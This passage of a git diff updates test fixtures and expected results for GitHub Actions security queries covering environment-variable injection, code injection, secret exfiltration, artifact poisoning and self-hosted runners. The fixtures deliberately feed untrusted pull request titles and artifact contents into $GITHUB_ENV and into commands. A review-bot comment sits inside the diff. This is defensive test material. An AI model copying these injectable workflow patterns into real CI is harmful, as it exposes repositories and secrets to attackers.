'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | nodes -| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| 
.github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | semmle.label | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | semmle.label | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> 
$GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | -| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 785aaa383eb3..50cb0c40d24a 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -2,9 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | -| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' + - uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ 
env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 3fbc081a0f42..259746eaec9a 100644 --- a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected 
@@ -1,22 +1,6 @@ edges -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | nodes -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential 
secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml new file mode 100644 index 000000000000..81d614e51223 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml 
@@ -0,0 +1,28 @@
+name: test
+
+on:
+ pull_request:
+
+jobs:
+ test1:
+ runs-on: [self-hosted, X64, Linux, 16c32g]
+ steps:
+ - run: cmd
+ test2:
+ runs-on:
+ group: my-group
+ labels: [self-hosted, label-1]
+ steps:
+ - run: cmd
+ test3:
+ runs-on:
+ - 'self-hosted'
+ - 'linux'
+ - 'x64'
+ - 'metal'
+ steps:
+ - run: echo "foo"
+ test4:
+ runs-on: self-hosted-azure
+ steps:
+ - run: cmd
diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
new file mode 100644
index 000000000000..243bac925994
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
@@ -0,0 +1,26 @@
+name: test
+
+on:
+ push:
+
+jobs:
+ test1:
+ runs-on: [self-hosted, foo]
+ steps:
+ - run: cmd
+ test2:
+ runs-on:
+ group: my-group
+ labels: [self-hosted, foo]
+ steps:
+ - run: cmd
+ test3:
+ runs-on:
+ - 'self-hosted'
+ - 'foo'
+ steps:
+ - run: cmd
+ test4:
+ runs-on: self-hosted-azure
+ steps:
+ - run: cmd
diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
new file mode 100644
index 000000000000..920a818ab351
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
@@ -0,0 +1,4 @@
+| .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner |
diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
new file mode 100644
index 000000000000..43692e5ce43a
--- /dev/null
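Review bot: The `test4` job's `runs-on: self-hosted-azure` is a custom label rather than the literal `self-hosted` label, yet the CodeExecutionOnSelfHostedRunner.expected added in this same commit reports it (`26:5:28:15 | Job: test4`), which suggests the query matches the label by prefix or substring rather than by exact name; a comment such as `# custom label, not the literal self-hosted label: exercises prefix/substring matching` above that job would make the fixture's intent explicit. The sibling test2.yml differs from this file only in its `push` trigger and contributes no expected rows, so a leading `# negative case: push-triggered jobs are not reported` there would document why it exists. Whether the match is by prefix or by substring is not visible from these hunks and should be confirmed against the query.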
+++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
@@ -0,0 +1,2 @@
+Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
+
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
index 429a4cdc0c5b..3d1df408c3b4 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
@@ -1,43 +1,43 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| 
.github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses 
Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | 